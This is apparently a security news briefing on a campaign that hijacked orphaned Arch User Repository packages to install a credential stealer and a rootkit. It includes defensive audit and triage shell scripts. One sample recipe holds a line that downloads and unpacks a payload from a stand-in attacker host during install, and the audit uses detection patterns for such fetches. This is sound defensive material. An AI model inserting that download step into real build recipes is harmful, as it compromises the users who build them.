Hackers backdoor 1,500 Arch Linux packages to steal developer secrets

One of the largest supply chain attacks ever aimed at the Arch Linux community quietly turned hundreds of trusted software packages into traps for developers. Attackers hijacked abandoned entries in the Arch User Repository (AUR), the community-run catalog of build recipes for the popular Linux distribution, and rigged them to install a credential stealer and a hard-to-spot kernel-level rootkit. Researchers at Sonatype, who named the campaign Atomic Arch, count roughly 1,500 compromised packages, with the activity first flagged by independent researcher Michael Taggart.

What happened

The AUR is a community-maintained collection of build scripts (called PKGBUILDs) for software that is not in Arch's official repositories. It is convenient but, by design, not vetted, which is exactly what the attackers leaned on. The campaign came in two waves: an initial 408 packages backdoored starting June 11, 2026, swelling to more than 1,500 a day later. Arch's official repositories were never touched, only the community AUR.

How the attack works

Rather than break in, the attackers abused a normal community process. When an AUR package is abandoned by its maintainer, other users can request to adopt it. The attackers took over these orphaned but still widely used packages (and in some cases spoofed trusted publishers), then edited the build script to add a post-install step that quietly pulls down a malicious package called atomic-lockfile. Anyone who built one of the tampered packages ran the payload: a Rust-based credential stealer that, on any system where it gained root access, could also load an eBPF rootkit: kernel-level code (referenced inside the malware as scales.bpf.c) that hides its own processes, files, and network traffic from monitoring tools.
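The tampering pattern described here, a recipe that reaches out to the network from inside a build or install function instead of declaring its inputs in source=(), is something a user can check for before running makepkg. The script below is an added example, not code from Arch, any AUR helper, or Sonatype: it audits a PKGBUILD or .install file with two heuristics of its own (a reference to the package name the report gives, and a curl/wget/base64 call inside a function body) against two recipes constructed for the example; the example-tool package, the example.invalid and attacker.invalid hosts, and the version strings are all made up.

```shell
#!/bin/sh
# Added example (not Arch, AUR-helper, or Sonatype code): heuristic audit of an
# AUR PKGBUILD or .install file for a recipe that pulls a second package from
# the network at build or install time. The package name comes from the report;
# the heuristics and the sample recipes are this example's own.

BAD_PKG="atomic-lockfile"

# audit_recipe FILE...  -> prints one line per finding; returns 0 if nothing
# suspicious was found in any file, 1 otherwise.
audit_recipe() {
    hits=0
    for f in "$@"; do
        # 1. Any mention of the known-bad package (in depends=(), a URL, a path).
        if grep -q "$BAD_PKG" "$f"; then
            echo "$f: references $BAD_PKG"
            hits=$((hits + 1))
        fi
        # 2. A download or decode inside a function body. Legitimate recipes
        #    fetch through source=() so makepkg can verify checksums; curl or
        #    wget inside build(), package() or an install hook bypasses that.
        if awk '
            /^(prepare|build|check|package[A-Za-z0-9_.-]*|pre_install|post_install|pre_upgrade|post_upgrade)\(\)/ { infunc = 1 }
            infunc && /(curl|wget|base64 (-d|--decode))/ { found = 1 }
            infunc && /^}/ { infunc = 0 }
            END { if (found) exit 0; exit 1 }' "$f"; then
            echo "$f: network fetch or decode inside a build/install function"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample recipes (not taken from the AUR) so the audit runs offline.
WORK=$(mktemp -d)
cat > "$WORK/PKGBUILD.clean" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
cat > "$WORK/PKGBUILD.tampered" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=2
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  # injected step: fetch a second package that makepkg never checksums
  curl -sL https://attacker.invalid/atomic-lockfile.tar.gz | tar xz -C /tmp
}
EOF

audit_recipe "$WORK/PKGBUILD.clean" && echo "clean recipe: no findings"
audit_recipe "$WORK/PKGBUILD.tampered" || echo "tampered recipe: review before building"
```

Run it against the PKGBUILD and any .install file in a cloned AUR package directory before building. A hit is a reason to read the diff against the previous commit, not proof of compromise: some legitimate recipes do call curl in prepare(), which is why the check reports rather than blocks.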

What it steals

Built for developer workstations and build servers, the stealer targets exactly the secrets that let an intruder spread further: GitHub and npm credentials, SSH keys, HashiCorp Vault tokens, Docker and Podman credentials, VPN materials, browser and Electron application data, and messages or tokens from Slack, Microsoft Teams, Discord, and Telegram, along with shell histories. It bundles the haul and ships it out over ordinary web uploads.

What you should do

Anyone who installed or rebuilt an AUR package since June 10 should assume compromise. Sonatype and the Arch maintainers advise rotating every credential that touched the machine (cloud keys, SSH keys, tokens, and passwords) and, because an eBPF rootkit can survive ordinary cleanup, seriously weighing a full reinstall of the system. Arch maintainers are removing the malicious commits and banning the accounts behind them. The episode is a reminder that community package repositories are a soft underbelly of the software supply chain, echoing recent campaigns that hid malware in npm and VS Code projects and the wider trend of attackers treating open source dependencies as a force multiplier. Sonatype's findings are laid out in the original report.
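The first step of the advice above is working out what was built or installed since June 10. pacman records every transaction in its log, so that list can be pulled from the host rather than from memory. The script below is an added example, not Arch or Sonatype tooling: it reads pacman-style log lines (constructed here; on a real host point PACMAN_LOG at /var/log/pacman.log), lists every package installed, upgraded or reinstalled on or after a date, and flags the package name the report gives. The example-tool and old-lib packages and their timestamps are made up.

```shell
#!/bin/sh
# Added example (not Arch or Sonatype code): triage helper that lists packages
# touched on or after a date from pacman's transaction log and flags the
# known-bad package. The log lines are constructed for the example.

BAD_PKG="atomic-lockfile"

# installs_since LOG YYYY-MM-DD -> unique package names installed, upgraded or
# reinstalled on or after the given day (ISO dates compare correctly as strings)
installs_since() {
    awk -v since="$2" '
        /^\[[0-9T:+-]+\] \[ALPM\] (installed|upgraded|reinstalled) / {
            day = substr($1, 2, 10)   # "[2026-06-12T10:15:09+0000]" -> "2026-06-12"
            if (day >= since) print $4
        }' "$1" | sort -u
}

# known_bad_installed LOG -> returns 0 if the known-bad package was ever installed
known_bad_installed() {
    grep -q "\[ALPM\] installed $BAD_PKG " "$1"
}

# Constructed log excerpt in pacman.log's format; replace with /var/log/pacman.log.
PACMAN_LOG=$(mktemp)
cat > "$PACMAN_LOG" <<'EOF'
[2026-06-05T09:12:44+0000] [ALPM] installed old-lib (3.1.0-1)
[2026-06-05T09:12:45+0000] [ALPM] installed example-tool (1.2.0-1)
[2026-06-12T10:15:03+0000] [PACMAN] Running 'pacman -U example-tool-1.2.0-2-x86_64.pkg.tar.zst'
[2026-06-12T10:15:09+0000] [ALPM] upgraded example-tool (1.2.0-1 -> 1.2.0-2)
[2026-06-12T10:15:12+0000] [ALPM] installed atomic-lockfile (0.1.0-1)
EOF

echo "Packages touched since 2026-06-10:"
installs_since "$PACMAN_LOG" 2026-06-10
if known_bad_installed "$PACMAN_LOG"; then
    echo "$BAD_PKG was installed: treat this host as compromised and rotate its credentials"
fi
```

The log does not say which packages came from the AUR, so cross-reference the output with `pacman -Qm`, which lists packages not present in any configured sync repository (in practice, AUR builds and local installs). Given the rootkit's ability to hide from monitoring on the host, an absence of findings here is not a clean bill of health; it only narrows the rotation list.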

Indicators of compromise

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.
